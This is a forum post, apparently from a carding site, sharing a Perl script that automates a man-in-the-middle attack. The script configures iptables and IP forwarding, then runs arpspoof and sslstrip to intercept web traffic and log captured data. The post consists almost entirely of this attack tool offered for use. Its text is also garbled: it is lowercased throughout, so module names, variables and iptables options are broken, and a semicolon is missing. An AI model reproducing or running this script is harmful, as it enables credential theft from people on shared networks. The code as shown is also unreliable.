here is a tool for automation of man in the middle attack:

code:
#!usr/bin/perl
use term::ansicolor;
################################################## ##########################
print "************************************************* *************\n"; #
print "+ -== juli ==- +\n"; #
print "+ -== man-in-the-middle attack script ==- +\n"; #
print "+ -== by em616 , em(at)em616.com , http://blog.em616.com ==- +\n"; #
print "************************************************* *************\n"; #
################################################## ##########################

# cleaning stuff
system "killall -9 sslstrip arpspoof:";
system "echo '0' > /proc/sys/net/ipv4/ip_forward";
system "iptables --table nat --flush";
system "iptables --flush";
system "iptables --delete-chain";
system "iptables --table nat --delete-chain";

#making a firewall, setting iptables roule to redirect port 80 to 5254
print color("bold red"), "setting up the iptables roulle\n", color("reset");
print color("bold red"), ". . ..\n", color("reset");
system "iptables -t nat -a prerouting -p tcp --destination-port 80 -j redirect --to-port 5254";
#port fawarding
print color("bold red"), "setting up port fawarding on our box\n", color("reset");
system "echo '1' > /proc/sys/net/ipv4/ip_forward";
## arpspoof script, must specify your interface and router ip
if ($#argv < 0) {
print q{
enter your interface and router ip, ex:
[email protected]:~$ perl juli.pl wlan0 192.168.0.1
};
exit;
} elsif ($#argv < 1) {
print "you have not provided all of the arguments required\n";
print color("bold green"), "perl juli.pl wlan0 192.168.0.1\n", color("reset");
exit;
}

$interface = $argv[0];
$getway = $argv[1];
print color("bold red"), "starting arpsoof on interface: $interface ip: $getway \n", color("reset");
system "arpspoof -i $interface $getway & sslstrip -a -k -l 5254 -w juliscript.log";
print "script stoped by you , check juliscript.log if we found anything \n"
# lineal ;)


read more: http://cardingmafia.ws/f25/automated...#ixzz3zti1usnz